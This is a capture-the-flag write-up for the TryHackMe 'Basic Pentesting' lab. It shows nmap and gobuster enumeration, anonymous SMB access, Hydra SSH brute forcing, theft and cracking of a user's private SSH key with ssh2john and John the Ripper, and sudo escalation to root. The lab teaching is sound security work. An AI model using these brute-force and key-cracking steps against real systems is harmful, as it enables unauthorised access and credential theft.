https://tryhackme.com/room/basicpentestingjt
Note, any passwords have been redacted out only the process is shown below.
Enumeration
Port Scan (nmap)
This room has no text walkthrough and just a list of questions to answer, so it will be a good test of what we have learned so far!
First we need to do a port scan to see what ports we can uncover: nmap -sV -v 10.10.163.73
.
Directory Scan (Gobuster)
We have uncovered a webserver at port 80. Now we can fire up gobuster (or dirbuster) and enumerate for any interesting directories: gobuster dir -u 10.10.163.73 -w /usr/share/wordlists/dirb/common.txt
Directory Browse
Gobuster did find one: /development
. There are two files here, dev.txt:
2018-04-23: I’ve been messing with that struts stuff, and it’s pretty cool! I think it might be neat to host that on this server too. Haven’t made any real web apps yet, but I have tried that example you get to show off how it works (and it’s the REST version of the example!). Oh, and right now I’m using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
and j.txt:
For J:
I’ve been auditing the contents of /etc/shadow to make sure we don’t have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.
-K
So know that we know that there are at least two users “j” and “k”, “J” has a weak and easily crackable password, SMB is setup, and we are using apache 2.5.12 (different from what nmap discovered).
We could look to see if there are any exploits for this version, which there is one: Apache Struts 2.5 < 2.512 RCE.
SMB Browse
We also know there is an SMB share, I ran smbclient -L 10.10.163.73
and see there is an Anonymous share name we could access with no username and pass:
smbclient //10.10.163.73/Anonymous -u anonymous
We logged in successfully!
# see directory listing
smb: \\> l
. D 0 Thu Apr 19 13:31:20 2018
.. D 0 Thu Apr 19 13:13:06 2018
staff.txt N 173 Thu Apr 19 13:29:55 2018
There is an intersting file named staff.txt
here! I tried to print staff.txt
but we did not have permission. We will instead have to try to download the file on our local machine. Let’s exit
the smbclient. Now we know this file is right in the root of the Anonymous share so lets run:
smbget -U anonymous smb://10.10.163.73/Anonymous/staff.txt
And voila! We have the staff.txt file! Let’s read it:
cat staff.txt 1 ⚙
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
Alright! So now we know the two users from the /development directory are most likely Jan and Kay. We could get lucky and they are just using these as their usernames! Let’s save them to our compendium just in case.
Password Bruteforcing (Hydra)
We can now boot up Hydra and try to brute force the password for jan, since we know it is weak and already cracked before:
hydra -t 5 -l jan -P /usr/share/wordlists/rockyou.txt -vV 10.10.163.73 ssh
After several minutes (fortunately the password was in the top 1000 of rockyou.txt
), we got the password! Let’s add this back to our compendium and we can now SSH in!
Gain Access (SSH)
Now that we have access, let’s see what all we can do.
# first let's see where we are
jan@basic2:~$ pwd
/home/jan
# okay, good we are in jan's home folder.
# I will also cd .. and run ls -l see who owns the folder
jan@basic2:/home$ ls -l
total 8
drwxr-xr-x 2 root root 4096 Apr 23 2018 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay
Unfortunately, Jan does not even own her own home folder (root does), which eliminates my plans to try to download a LinEnum script into her home folder to run. We will have to check out some hotspots manually:
# first, let's check crontab and see if there are any user tasks
# running as sudo we could exploit
jan@basic2:/home$ cat /etc/crontab
# at the very end we just see a #, whcih means there are no custom jobs
# now let's check important files such as /etc/passwd and /etc/shadow
# I just ls'd the directory but used grep to only grab those two
# file names
jan@basic2:/home$ ls -l /etc | grep 'passwd\\|shadow'
-rw-r----- 1 root shadow 673 Apr 19 2018 gshadow
-rw------- 1 root root 665 Apr 19 2018 gshadow-
-rw-r--r-- 1 root root 1639 Apr 23 2018 passwd
-rw------- 1 root root 1602 Apr 19 2018 passwd-
-rw-r----- 1 root shadow 1085 Apr 23 2018 shadow
-rw------- 1 root root 963 Apr 19 2018 shadow-
Interestingly, everyone has read permissions on /etc/passwd
! we can cat /etc/passwd
to see if there is anything else useful. We do at least see the user kay in here in the file. We can also run cat /etc/group
and see what memberships we have.
Here we can see kay is a member of several admin groups! Gaining access to her account would grant us much higher access. Let’s check out her home folder and see if there is anything there for us:
jan@basic2:~$ cd /home/kay
# now lets check for files
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
On first thought, we see a pass.bak file. However our user does not have read permissions for it, so it is no use. If we look at the .ssh
directory, we are allowed to read it! Let’s cd
in and see what we have:
jan@basic2:/home/kay$ cd .ssh
# look at the files
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
Well that’s not good! For Kay, at least. We can access her id_rsa
file! With this, we can copy its’s contents and login via her using the ssh command! Run cat id_rsa
and copy all of this to a file on your local machine named id_rsa
.
Now we can exit our ssh as jan and be back in our own terminal. One of the other issues with this id_rsa
file is that it’s encrypted with AES-128-CBC. So even if we try to use it, it will ask us for a passphrase and we do not yet know it. We can use a script called ssh2john to try and crack the encryption on the key:
# on kali it is installed already in the listed directory
# otherwise you can wget the script from above and run it that way
# this will output the file into a format john the ripper can decode
┌──(kali㉿kali)-[~/thm]
└─$ python /usr/share/john/ssh2john.py /home/kali/thm/id_rsa > crack.txt
# now we can run john the ripper on it for the passphrase
┌──(kali㉿kali)-[~/thm]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
-redacted- (/home/kali/thm/id_rsa)
Great, now we know the passphrase for the id_rsa key! Let’s use this to login.
┌──(kali㉿kali)-[~/thm]
└─$ ssh -i "/home/kali/thm/id_rsa" [email protected] 1 ⚙
Enter passphrase for key '/home/kali/thm/id_rsa':
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
We’re in!
Now if we remember from before, there was an interesting file in kay’s home directory named pass.bak
. We are already logged into their home directory, so let’s just cat pass.bak
. And now we have their actual password!
We can run sudo – l and insert their super long password, and we see that this user can run all commands as sudo!
kay@basic2:~$ sudo -l
[sudo] password for kay:
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
So let’s elevate even higher and run sudo /bin/bash
. Now we have a terminal as root!
kay@basic2:~$ sudo /bin/bash
root@basic2:~# whoami
root
For our final step, let’s cd into roots home directory: cd /root
and grab that flag! cat flag.txt
Machine Compendium
All the information about our target machine, I continually update this as we discover more info!
{
"MACHINE_IP": "10.10.163.73",
"MACHINE_INFO" : {
"os": "Ubuntu Linux",
"commonName": ""
},
"OPEN_PORTS": {
"22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.4"],
"80": ["http", "Apache httpd 2.4.18"],
"139": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
"445": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
"8009": "ajp13?",
"8080": "http-proxy"
},
"CREDENTIALS":{
},
"OTHER_INFO": {
"vulnerabilities": ['CVE 2017-9805 - Apache RCE'],
"notable_web_dir": ["/development"]
}
}
Comments
No comments available.